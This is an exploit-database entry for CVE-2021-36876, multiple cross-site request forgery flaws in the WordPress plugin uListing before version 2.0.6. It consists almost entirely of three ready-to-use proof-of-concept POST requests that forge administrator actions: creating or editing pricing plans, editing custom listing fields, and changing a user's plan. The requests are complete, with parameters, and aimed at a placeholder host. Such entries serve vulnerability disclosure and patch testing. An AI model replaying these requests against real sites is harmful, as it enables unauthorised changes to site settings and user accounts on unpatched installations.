Exploit for uListing < 2.0.6 - Multiple CSRF CVE-2021-36876

Name: Exploit for uListing < 2.0.6 - Multiple CSRF CVE-2021-36876
Rating: 5 (315 reviews)

2021-07-27 | CVSS 6.8

## https://sploitus.com/exploit?id=WPEX-ID:FAE06FBC-A128-43FF-8F2A-7886957D8881
PoC | CSRF | Add/Edit Pricing Plans:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [agent or admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 265

action=action_save_post&post_id=66&data%5Bprice%5D=1337&data%5Btype%5D=limit_count&data%5Btitle%5D=PoC&data%5Bstatus%5D=active&data%5Bduration%5D=13&data%5Bduration_type%5D=year&data%5Bfeature_limit%5D=0&data%5Blisting_limit%5D=31337&data%5Bpayment_type%5D=one_time

PoC | CSRF | Add/Edit Custom Fields:

POST /wp-admin/admin.php?page=listing_attribute HTTP/2
Host: example.com
Cookie: [cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 268

StmListingAttribute%5Bid%5D=16&StmListingAttribute%5Bname%5D=accessories&StmListingAttribute%5Btype%5D=multiselect&action=listing_attribute_save&StmListingAttribute%5Btitle%5D=PoC&StmListingAttribute%5Baffix%5D=&icon_type=0&StmListingAttribute%5Bicon%5D=&submit=Update

PoC | CSRF | User Plan Edit:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 85

action=stm_create_user_plan&status=active&plan=13&expired_date=28-02-2022&user=1&id=1